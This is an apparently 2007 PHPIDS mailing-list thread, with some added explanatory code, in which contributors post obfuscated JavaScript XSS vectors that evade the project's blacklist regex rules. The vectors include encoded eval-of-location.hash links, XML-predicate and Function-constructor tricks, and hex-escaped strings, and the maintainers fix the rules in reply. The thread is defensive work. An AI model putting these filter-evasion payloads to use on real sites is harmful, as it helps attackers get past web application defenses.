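  console.log(name.padEnd(18), JSON.stringify(whichRulesFire(js)));
}
```

The ASCII rule misses the Unicode identifier entirely, the \p{L} rule catches it but needs engine support for property escapes (the compatibility concern raised above), and the sink-anchored rule catches both without caring what the identifier looks like, which is why rules keyed on the dangerous function name tend to age better than rules that try to describe valid identifiers.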

christ1an

Sep 16, 2007, 7:27:03 PM9/16/07
to Martin Hinks
Actually we can inject arbitrary JS code at the moment since we can
bake all JS functions and every single char using this kind of vector:

http://phpfi.com/263306

If we have functions such as eval, decodeURIComponent, replace or
String.fromCharCode, we can do pretty much what we want, I guess.

Anyway, nothing of this really has to do with intrusion detection. It's
just circumventing a blacklist filter and hoping that the browser
executes it.

I'll leave that for tomorrow.

- christ1an


thornmaker

Sep 17, 2007, 12:12:23 AM9/17/07
to PHPIDS Web Application Security 2.0
I was wondering if the rule descriptions were up to date... My
injections are being blocked by:

(?:[":;,]\s*[)}\]]+)
finds closing JavaScript breaker including whitespace attacks

however they do not visually appear to match this rule. For
example...

a='';b

gets through fine, but

a='';b=

gets blocked by this rule... which just doesn't seem right.
Perhaps I am too tired to be thinking clearly... I'll look again in
the morning.

All is not lost... this one gets through...
http://demo.php-ids.org/?test=%61%3D%27%27%0A%62%3D%66%61%6C%73%65%3F%30%3A%27%65%76%61%27%0A%62%2B%3D%66%61%6C%73%65%3F%30%3A%27%6C%27%0A%63%3D%66%61%6C%73%65%3F%30%3A%27%6C%27%0A%63%2B%3D%66%61%6C%73%65%3F%30%3A%27%6F%63%61%74%69%6F%6E%2E%68%61%73%27%0A%63%2B%3D%66%61%6C%73%65%3F%30%3A%27%68%2E%73%75%62%73%74%27%0A%63%2B%3D%66%61%6C%73%65%3F%30%3A%27%72%28%31%29%27%0A%64%3D%28%30%5B%62%5D%0A%29%0A%64%28%64%28%63%0A%29%0A%29#alert%28%27avast%21%27%29
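When a rule seems to fire on input it visibly does not match, the first thing to check is whether the regex alone matches the raw string, or whether a normalisation step ahead of the matcher changed the input. The harness below is an added example and not PHPIDS code: it scores inputs against a small constructed rule set the way a regex-based IDS does. The breaker regex and its description are copied from thornmaker's post above; the two eval-alias rules and all impact values are assumed for this demonstration. It shows that the breaker rule fires on neither `a='';b` nor `a='';b=` as typed (so a block on the second has to come from something done to the string before matching), and that a whitespace-blind alias rule treats `a = eval;` and `a=eval;` differently while a `\s*` version does not, which is the spacing issue Martin reported earlier in the thread.

```javascript
// Added example, not PHPIDS code: a minimal regex-rule scorer so that a
// rule can be checked against the raw input string, independent of the
// normalisation ("converter") step a real engine runs before matching.

// Constructed rule set. The first regex and its description are the ones
// quoted in thornmaker's post; the impact values are assumed for this demo.
const RULES = [
  {
    id: 'js-breaker',
    re: /(?:[":;,]\s*[)}\]]+)/,
    impact: 4,
    description: 'finds closing JavaScript breaker including whitespace attacks',
  },
  {
    // Whitespace-blind: only "a=eval;" with no spaces around "=" matches.
    id: 'eval-alias-strict',
    re: /\w+=eval;/,
    impact: 5,
    description: 'eval aliased to another name (no whitespace tolerated)',
  },
  {
    // Same intent with \s* around "=" and before ";", so "a = eval ;" also matches.
    id: 'eval-alias-tolerant',
    re: /\w+\s*=\s*eval\s*;/,
    impact: 5,
    description: 'eval aliased to another name (whitespace tolerated)',
  },
];

// Run every rule over the input; return the ids that fired and the summed impact.
function score(input, rules = RULES) {
  const fired = rules.filter((r) => r.re.test(input));
  return {
    matched: fired.map((r) => r.id),
    impact: fired.reduce((sum, r) => sum + r.impact, 0),
  };
}

// Constructed inputs taken from the discussion: the two strings thornmaker
// compared, and the spaced / unspaced eval alias Martin reported earlier.
const SAMPLES = ["a='';b", "a='';b=", 'a = eval;a(test);', 'a=eval;a(test);'];

for (const s of SAMPLES) {
  const { matched, impact } = score(s);
  console.log(JSON.stringify(s).padEnd(20), 'impact', impact, matched.join(',') || '-');
}
```

Running a rule in isolation like this separates two different bugs: a regex that is wrong, and a converter that rewrites the input into something the regex was never meant to see. The strict/tolerant pair also shows why a rule should be written around the tokens that matter (`eval`, `=`, `;`) and let `\s*` absorb the whitespace between them, rather than be tuned to one exact spelling.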

xorrer

Sep 17, 2007, 3:16:53 AM9/17/07
to PHPIDS Web Application Security 2.0
On Sep 17, 1:27 am, christ1an <ch0...@googlemail.com> wrote:
> Actually we can inject arbitrary js code at the moment since we can
> bake all js functions and every single char using this kind of vector:

Yep, that Unicode stuff I stumbled upon yesterday with variable names
like 'ä' will cause some problems.

> Anyway, nothing of this really has todo with intrusion detection. Its
> just circumventing a blacklist filter and hope that the browser
> executes it.

I don't really understand this statement. So you don't consider XSS
attacks to be something which PHPIDS should detect? Then what is an
IDS for a webapp supposed to find, if XSS doesn't fall into ID?



Mario Heiderich

Sep 17, 2007, 3:51:50 AM9/17/07
to PHPIDS Web Application Security 2.0
> Anyway, nothing of this really has todo with intrusion detection. Its
> just circumventing a blacklist filter and hope that the browser
> executes it

I think this thread is very important both for PHPIDS and for
the readers. Personally speaking, I haven't learned that much about XSS
and JS in general in a very long time. Starting with the XML
predicates, Unicode labels, the weirdest concatenations, anonymous
methods put together in ways one would never expect them to execute
and so on. (We should assemble a paper about that!!!)

The filter rules before starting this thread had a size of 26372 bytes
and detected none of the listed vectors - now they have a size of 24259
bytes and are able to detect any of the listed ones. Sure - after this
storm has slowed down there will be much work to fix false positives -
in fact I fixed several ones yesterday evening - but that is plainly
the evolution the PHPIDS has to go through.

In my eyes any new submission is greatly appreciated and very much
helps the system in getting better. What do you think?


Martin Hinks

Sep 17, 2007, 3:56:37 AM9/17/07
to php...@googlegroups.com
This process is absolutely crucial for the IDS! It is only through the
expert knowledge and time donated by people who really know what they
are doing when it comes to attacks that the blacklist-system can ever
be effective. Sure, there will always be new vectors, but this process
is the core of PHPIDS. Without excellent filter rules it's just a
glorified regex matching engine.

Martin

Mario Heiderich

Sep 17, 2007, 4:10:17 AM9/17/07
to php...@googlegroups.com
100% agreement with Martin!

Ah and btw: I added a new feature to the converter - small but maybe with strange results - so please excuse if the demo rules _might_ act a little bit weird. I am still testing... :)


xorrer

Sep 17, 2007, 4:52:45 AM9/17/07
to PHPIDS Web Application Security 2.0
I worked out this http://groups.google.com/group/php-ids/msg/f1706c3ff2eeaf98
idea from Gareth.

http://demo.php-ids.org/?test=s1%3D%3Cs%3Eevalalerta%281%29a%3C%2Fs%3E%3B+s2%3D%3Cs%3E%3C%2Fs%3E%2B%27%27%3B+s3%3Ds1%2Bs2%3B+e1%3D%2Fs1%2F%3Fs3%5B0%5D%3As1%3B+e2%3D%2Fs1%2F%3Fs3%5B1%5D%3As1%3B+e3%3D%2Fs1%2F%3Fs3%5B2%5D%3As1%3B+e4%3D%2Fs1%2F%3Fs3%5B3%5D%3As1%3B+e%3D%2Fs1%2F%3F.0%5Be1%2Be2%2Be3%2Be4%5D%3As1%3B+a1%3D%2Fs1%2F%3Fs3%5B4%5D%3As1%3B+a2%3D%2Fs1%2F%3Fs3%5B5%5D%3As1%3B+a3%3D%2Fs1%2F%3Fs3%5B6%5D%3As1%3B+a4%3D%2Fs1%2F%3Fs3%5B7%5D%3As1%3B+a5%3D%2Fs1%2F%3Fs3%5B8%5D%3As1%3B+a6%3D%2Fs1%2F%3Fs3%5B10%5D%3As1%3B+a7%3D%2Fs1%2F%3Fs3%5B11%5D%3As1%3B+a8%3D%2Fs1%2F%3Fs3%5B12%5D%3As1%3B+a%3Da1%2Ba2%2Ba3%2Ba4%2Ba5%2Ba6%2Ba7%2Ba8%3Be%28a%29


Martin Hinks

Sep 17, 2007, 4:57:53 AM9/17/07
to php...@googlegroups.com
Awesome use of the XML predicates!

Thanks xorrer!

M

xorrer

Sep 17, 2007, 5:05:26 AM9/17/07
to PHPIDS Web Application Security 2.0

christ1an

Sep 17, 2007, 6:23:07 AM9/17/07
to php...@googlegroups.com
> I don't really understand this statement. So you don't consider XSS
> attacks to be something which PHPIDS should detect? Then what is an
> IDS for a webapp supposed to find, if XSS doesn't fall into ID?

Well, as one of the initial founders of PHPIDS I always have to keep our main objective in mind. In fact, with these kinds of threads, we are losing focus on that objective. What I am talking about is intrusion detection, a term that implies several aspects, two of which are functionality in the sense of effectiveness and performance combined with simplicity.

We intend to recognize attacks against PHP-written web applications, neither vector recognizing nor a direct kind of attack prevention. The only exception concerning the latter would probably be modifying the IDS to be an IPS by just blocking malicious-appearing requests. Be that as it may, it's a different thing.

What we are currently doing is building totally weird (cool) JavaScript vectors that slip through our attack detection routine, simply due to their abstractness. Moreover, most of these vectors will only be executed if they are output directly within a <script> tag, not even within a variable within a <script> tag that would need to be broken off prior to inserting the payload. I'd say, at least as far as XSS is concerned, we are able to detect around about 95% of all attacks that are actually being performed on real environments, in practice.

Now let's go back to practice. I consider it highly unlikely that an attacker would try to perform an unnoticed attack against an application that he knows is running PHPIDS. If he doesn't assume that some kind of IDS is running, he'd just fire some trivial vectors to see first results, which of course would be detected. Nobody can tell me that an attacker would try such weird vectors as we are talking about here in the beginning and on the first try.

I hope you now understand my point that we are losing focus. Nevertheless, I highly appreciate this input and we will of course continue to fix them in future. However, soon the point will be reached where we will have to decide whether or not it is necessary to modify and refine rules, considering our greatest enemy - false positives.

You see, intrusion detection is - if done professionally - far away from being an easy job. It's pretty much all about calculating risks. Tough job.


> This process is absolutely crucial for the IDS! It is only through the
> expert knowledge and time donated of people who really know what they
> are doing when it comes to attacks that the blacklist-system can ever
> be effective. Sure, there will always be new vectors, but this process
> is the core of PHPIDS. Without excellent filter rules it's just a
> glorified regex matching engine.

Exactly. Right now, we are in a stage where this kind of input is >>needed<<. However time will come when we will go one step further to make the IDS effective in what it does. It's not a regex matching engine, you are perfectly right on that.

I also fully agree with Mario. I personally have learned a lot while developing PHPIDS and reading your feedback, bug reports and so forth. I'm sure everyone who participated shares this opinion.

So ultimately, let's just continue what we're doing; and more importantly, let's do it professionally.

- christ1an


xorrer

Sep 17, 2007, 11:12:23 AM9/17/07
to PHPIDS Web Application Security 2.0
Ok christ1an, now I understand what you meant. And I agree that the
PHPIDS probably already detects most of the attacks that matter for
real world applications.

Btw. I found this one
http://demo.php-ids.org/?test=%C2%BCscript%C2%BE+%C3%A4%3D+alert%2C+%C3%A4%281%29+%C2%BC%2Fscript%C2%BE.
But I don't really know if it would work if the circumstances were
right (the US-ASCII problem, found by Kurt Huwig).

And there seems to be a problem with the acute accent "´". After
sending just that character, the answer says:

<h3>found injection: &Acirc;&acute;</h3>


Mario Heiderich

Sep 17, 2007, 11:27:09 AM9/17/07
to php...@googlegroups.com
Hi xorrer!

We once had a rule for that one but to be honest I didn't ever manage to get this one running. So I think this is ignorable. What do you think?

The accent/backtick is being detected when coming alone as SQL injection because it's a _very_ common pattern to just inject a quoting char. So I decided to add this pattern to the rules - It shouldn't create many false positives so I think we should keep it in.

Greetings,
.mario


xorrer

Sep 17, 2007, 11:36:16 AM9/17/07
to PHPIDS Web Application Security 2.0
I agree on the first one.

But the second one wasn't about detecting the acute accent, which is
correct, but about the answer from PHPIDS,

which includes &Acirc;&acute;. Where does this &Acirc; come from?
That's what I meant.


Mario Heiderich

Sep 17, 2007, 11:41:37 AM9/17/07
to php...@googlegroups.com
Ah, now I get it. That should be some encoding issue on certain OSes. The output is validated several times, so some special chars may produce weird output like

found injection: ´

This is a demo-only issue and has nothing to do with PHPIDS. Btw - above is my output on Ubuntu 7.1 - on the WinXP VMs it looks completely different.

Grx,
.mario

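The `&Acirc;&acute;` xorrer asked about is the classic signature of a UTF-8 string being re-read as ISO-8859-1 before entity encoding, which fits Mario's "encoding issue on certain OS" explanation. The block below is an added example, not code from the thread or from PHPIDS: it traces a lone `´` through UTF-8 encoding, a Latin-1 misread and a named-entity encoder. The entity table is a constructed minimal one, and the assumption that the demo's output path behaves like PHP's htmlentities() on a Latin-1 misread is this example's, not something the thread states.

```javascript
// Added example, not from the thread: reproduce how a lone "´" (U+00B4)
// comes back as "&Acirc;&acute;". This is a UTF-8 string being re-read as
// ISO-8859-1 (mojibake) before entity encoding; it assumes the demo's
// output path behaves like PHP's htmlentities() on a Latin-1 misread.

// Step 1: the browser submits "´" UTF-8 encoded, i.e. the two bytes C2 B4.
function utf8Bytes(text) {
  return Array.from(Buffer.from(text, 'utf8'));
}

// Step 2: read those bytes one character per byte as ISO-8859-1. Byte C2 is
// "Â" (U+00C2) and B4 is "´" (U+00B4): one character has become two.
function misreadAsLatin1(bytes) {
  return Buffer.from(bytes).toString('latin1');
}

// Step 3: an entity encoder that emits named entities for Latin-1 characters
// (constructed, minimal table) turns "Â´" into "&Acirc;&acute;".
const NAMED_ENTITIES = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '\u00C2': '&Acirc;',
  '\u00B4': '&acute;',
};
function htmlEntities(text) {
  return Array.from(text).map((ch) => NAMED_ENTITIES[ch] ?? ch).join('');
}

// Trace the whole path for one input and return each intermediate form.
function traceMojibake(text) {
  const bytes = utf8Bytes(text);
  const misread = misreadAsLatin1(bytes);
  return {
    bytes: bytes.map((b) => b.toString(16).toUpperCase()),
    misread,
    html: htmlEntities(misread),
  };
}

console.log(traceMojibake('\u00B4'));
```

The useful defender-side point is that the extra `&Acirc;` is not something the sender typed and not something the rules saw: it is produced after detection, by a display layer that decoded the request with the wrong charset. Checking the charset of each hop (request decoding, storage, output encoding) is the fix; tuning rules against the mangled form would only chase an artifact.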

xorrer

Sep 17, 2007, 12:27:01 PM9/17/07
to PHPIDS Web Application Security 2.0
Ah, ok.

http://demo.php-ids.org/?test=a%3C%2Ftd%3E%C3%A4%3C%2Ftr%3E%C3%A4%3C%2Ftable%3EPre-XSS%3F%3Cbr%3E%3Ch1%3EPre-XSS%3F%3C%2Fa%3E

Here's an attribute-breaking injection, which also heavily messes up the
page for fun.


Mario Heiderich

Sep 17, 2007, 5:30:19 PM9/17/07
to PHPIDS Web Application Security 2.0
Yep - it works. <marquee> creates some funny output as well.

Nevertheless, here's a copy of what I posted on slackers recently to
make some things clearer:

<copy&paste>
I'm a bit frightened by the suddenly changed atmosphere. To avoid
misunderstanding and to express my absolutely personal opinion, here's
my 2 cents (as initial founder and maintainer of the rules):

- I love waking up in the morning and seeing new injection vectors
after checking my mails - the weirder the better

- I love fixing them ASAP - some fixes are better, some worse - but
all in all it so much helps to increase the quality of the product
that is called PHPIDS. The fast release cycles make PHPIDS better
than the commercial solutions because we can react to new exploit
vectors in half an hour.

- The maybe stupid-sounding slogan 'Web Application Security 2.0' is
more than a slogan - it's what the project is all about - it's the
knowledge of an unlimited amount of people brought together in one
open tool. We didn't choose the LGPL at random but on purpose. Need the
rules to improve your project? Take 'em!

- And last but not least - the project will never be perfect and there
will always be an attack surface. But we are all working on making
that attack surface smaller and smaller every day.

Please continue submitting your vectors and helping us out - I try to
give credit as much as my time allows and I hope you are cool with
that. If not, just drop us a line. Any input whatsoever is very much
appreciated and w/o your help the project would be nothing.

Thanks for all of your recent work - please give us more reasons to
dream of weird JavaScript madness (the SQLi contest is already
waiting) :)!!

.mario
</copy&paste>



Gareth

Sep 17, 2007, 9:32:26 PM9/17/07
to PHPIDS » Web Application Security 2.0
s=function test2() {return 'hrefjavascriptalert(1)a';1,1}();
void(a = {} );
void(c = URL );
a.c=function xyz() {return c[4] }();
a.h1=function xyz() {return s[0] }();
a.h2=function xyz() {return s[1] }();
a.h3=function xyz() {return s[2] }();
a.h4=function xyz() {return s[3] }();
a.u1=function xyz() {return s[4] }();
a.u2=function xyz() {return s[5] }();
a.u3=function xyz() {return s[6] }();
a.u4=function xyz() {return s[7] }();
a.u5=function xyz() {return s[8] }();
a.u6=function xyz() {return s[9] }();
a.u7=function xyz() {return s[10] }();
a.u8=function xyz() {return s[11] }();
a.u9=function xyz() {return s[12] }();
a.u10=function xyz() {return s[13] }();
a.u11=function xyz() {return s[14] }();
a.u12=function xyz() {return s[15] }();
a.u13=function xyz() {return s[16] }();
a.u14=function xyz() {return s[17] }();
a.u15=function xyz() {return s[18] }();
a.u16=function xyz() {return s[19] }();
a.u17=function xyz() {return s[20] }();
a.u18=function xyz() {return s[21] }();
$_=function xyz() {return a.u1 + a.u2 + a.u3 + a.u4 + a.u5 + a.u6 +
a.u7 + a.u8 + a.u9 + a.u10 + a.c + a.u11 + a.u12 + a.u13 + a.u14 +
a.u15 + a.u16 + a.u17 + a.u18 }();
for(i in x=this) x[a.h1+a.h2+a.h3+a.h4]=$_;


thornmaker

Sep 18, 2007, 12:03:17 AM9/18/07
to PHPIDS Web Application Security 2.0
@xorrer: I just learned from your vector that a regexp can be used
as the boolean with the ternary operator... that's cool!
@gareth: good stuff there... and here I thought 'function' was
filtered, but never even tried it
@.mario: http://xkcd.com/208/ - did I show you this comic already? I
have a bad memory for stuff like that... anyhow... every time I think
of you fixing the filters, this comic comes to mind.

And here's my first one using the XML tags... and also the shortest
one I've found in a long time.

http://demo.php-ids.org/?test=%61%3D%3C%72%3E%6C%6F%63%61%3C%76%3E%65%3C%2F%76%3E%74%69%6F%6E%2E%68%61%73%3C%76%3E%76%61%3C%2F%76%3E%68%2E%73%75%62%73%3C%76%3E%6C%3C%2F%76%3E%74%72%28%31%29%3C%2F%72%3E%0A%7B%62%3D%30%65%30%5B%61%2E%76%2E%74%65%78%74%28%29%0A%5D%7D%68%74%74%70%3D%27%27%3B%62%28%62%28%68%74%74%70%2B%61%2E%74%65%78%74%28%29%0A%29%29#alert%28%27XML%20w00t%27%29

a=<r>loca<v>e</v>tion.has<v>va</v>h.subs<v>l</v>tr(1)</r>
{b=0e0[a.v.text()
]}http='';b(b(http+a.text()
))


Gareth

Sep 18, 2007, 1:10:18 AM9/18/07
to PHPIDS Web Application Security 2.0
s=function test2() {return 'aalert(1)a';1,1}();
void(a = {} );
a.a1=function xyz() {return s[1] }();
a.a2=function xyz() {return s[2] }();
a.a3=function xyz() {return s[3] }();
a.a4=function xyz() {return s[4] }();
a.a5=function xyz() {return s[5] }();
a.a6=function xyz() {return s[6] }();
a.a7=function xyz() {return s[7] }();
a.a8=function xyz() {return s[8] }();
$=function xyz() {return a.a1 + a.a2 + a.a3 +a.a4 +a.a5 + a.a6 + a.a7
+a.a8 }();
new Function($)();


Gareth

Sep 18, 2007, 2:38:28 AM9/18/07
to PHPIDS Web Application Security 2.0
x = localName.toLowerCase() + 'lert(1),' + 0x00;new Function(x)()


Mario Heiderich

Sep 18, 2007, 4:19:05 AM9/18/07
to php...@googlegroups.com
Hi!

Nice ones again! I am still struggling with the last XML predicate vector and am thinking about adding a rule of its own to detect those kinds of attacks. The other ones are fixed...

@thornmaker: yep - knew the comic. Unfortunately no lianas in our office ;)




Gareth

Sep 18, 2007, 4:33:22 AM9/18/07
to PHPIDS Web Application Security 2.0
Isn't JavaScript amazing? You can pass strings to the Function
constructor and it will embed them as the code of the new function :D


Mario Heiderich

Sep 18, 2007, 4:44:36 AM9/18/07
to php...@googlegroups.com
Yep - it's so weird. I mean, anything you pass to a new Function construct will be auto-evaluated.

And - of course - you can do that too:

x='\x61\x6c\x65\x72\x74\x28\x31\x29';
new Function(x)()

This could be posted to the other thread too I guess?

Greetings,
.mario



xorrer

Sep 18, 2007, 10:45:59 AM9/18/07
to PHPIDS Web Application Security 2.0